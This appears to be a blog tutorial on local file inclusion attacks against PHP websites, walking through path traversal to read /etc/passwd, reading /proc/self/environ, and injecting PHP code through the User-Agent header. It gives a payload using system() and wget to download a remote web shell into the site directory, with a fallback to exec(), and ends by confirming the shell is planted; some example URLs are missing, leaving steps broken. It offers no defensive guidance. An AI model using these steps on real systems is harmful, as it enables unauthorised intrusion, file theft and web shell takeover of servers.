Amir Roknifard
Amir Roknifard is a cyber security professional with years of professional experience and proven track record in cyber security management and risk consulting, helping boards to better manage their cyber risk and transform their cyber security practices. He is the founder of Academician Journal that aims to close the gap between academy and InfoSec industry. He also has authored and reviewed books, published articles, and developed a master's degree program in cyber security.

File Inclusion Attack

A file inclusion is a vulnerability which allows an attacker to access unauthorised file on web server and can execute the malicious code by using ‘include’ functional vulnerability. The local file inclusion LFI is a process of Including Local File available on webserver. This vulnerability occur when a user input contains the path of the file that has been included. When this input is not properly sanitised then an attacker give the some default files location and access all these sensitives files.

Lets suppose this website is vulnerable to local file inclusion attack:

Now lets replace contact.php with ../ and try the new URL:|

Now after requesting this page we got an error. There is a big chance to have a Local File Inclusion vulnerability.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/roknifard/public_html/ on
line 1337

Now lets check for etc/passwd to see the if Local File Inclusion is vulnerable:

we got an error and now we include more directories to look for etc/passwd file

If you will get a page like the following, that means you have successfully Included a /etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news:
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin 

We successfully included a file and our next step is to include a proc/self/environ file. So now replace /etc/passwd with /proc/self/environ file.

If you get something like the following, that means you have successfully included a proc/self/environ file.

DOCUMENT_ROOT=/home/roknifard/public_html GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml,
image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 
on SCRIPT_FILENAME=/home/roknifard/public_html/index.php SCRIPT_NAME=/index.php
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2
mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/ Server at Port 80

proc/self/environ is accessible. If you got a blank page or an error, that means proc/self/environ is not accessible or the OS is a FreeBSD.

Now let’s inject our malicious code in proc/self/environ. We can inject our code in User-Agent HTTP Header. Use Tamper Data Add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

Now Tamper this page and in user agent add you uploader script and then submit. You will get an uploader on /proc/self/environ page, just browse and upload your shell.

You can also upload your shell by downloading remotely using wget command.

<?system('wget -O shell.php');?>

Add this command in user agent and request the page. Now our command is successfully executed and will download the .txt shell from and save it as shell.php in the website directory. through system(), and our shell will be created. If didn’t work, try exec() because system() can be disabled on the webserver from php.ini.

Now lets check if our malicious code, if it was successfully injected. Lets check if the shell is present.

Our shell is there. Injection was successful.